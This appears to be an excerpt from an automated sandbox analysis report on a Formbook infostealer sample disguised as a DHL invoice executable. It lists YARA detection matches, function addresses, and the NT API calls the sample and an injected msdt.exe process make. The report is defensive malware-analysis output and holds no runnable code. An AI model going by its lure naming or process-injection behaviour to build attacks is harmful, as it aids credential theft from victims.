          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E2855
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_00E2C554
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_00E2E8AB
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_00E2E8B8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041DB58
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041E4E9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00402D89
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041E59C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D5A3
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041EDB1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041DE45
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409E5C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409E60
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00992855
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146F900
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521002
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153E824
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015328EC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B090
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015320A8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01532B28
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152DBD2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015203DA
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149EBB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FA2B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015322AE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01531D55
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01532D07
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01460D20
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015325DD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152D466
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147841F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153DFCE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01531FF1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152D616
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01486E30
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01532EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04900D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04926E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071DB58
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071E4E9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D5A3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071EDAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00702D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071E59C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00702D89
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00709E60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00709E5C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071DE45
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00702FB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: String function: 0146B150 appears 45 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0490B150 appears 35 times
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A40A NtReadFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A53C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AA770 NtOpenThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A410 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A490 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A40A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A53C NtAllocateVirtualMemory,
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilename vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.366898086.0000000005B80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000000.348349236.00000000004E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilename vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000000.358229484.0000000000992000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
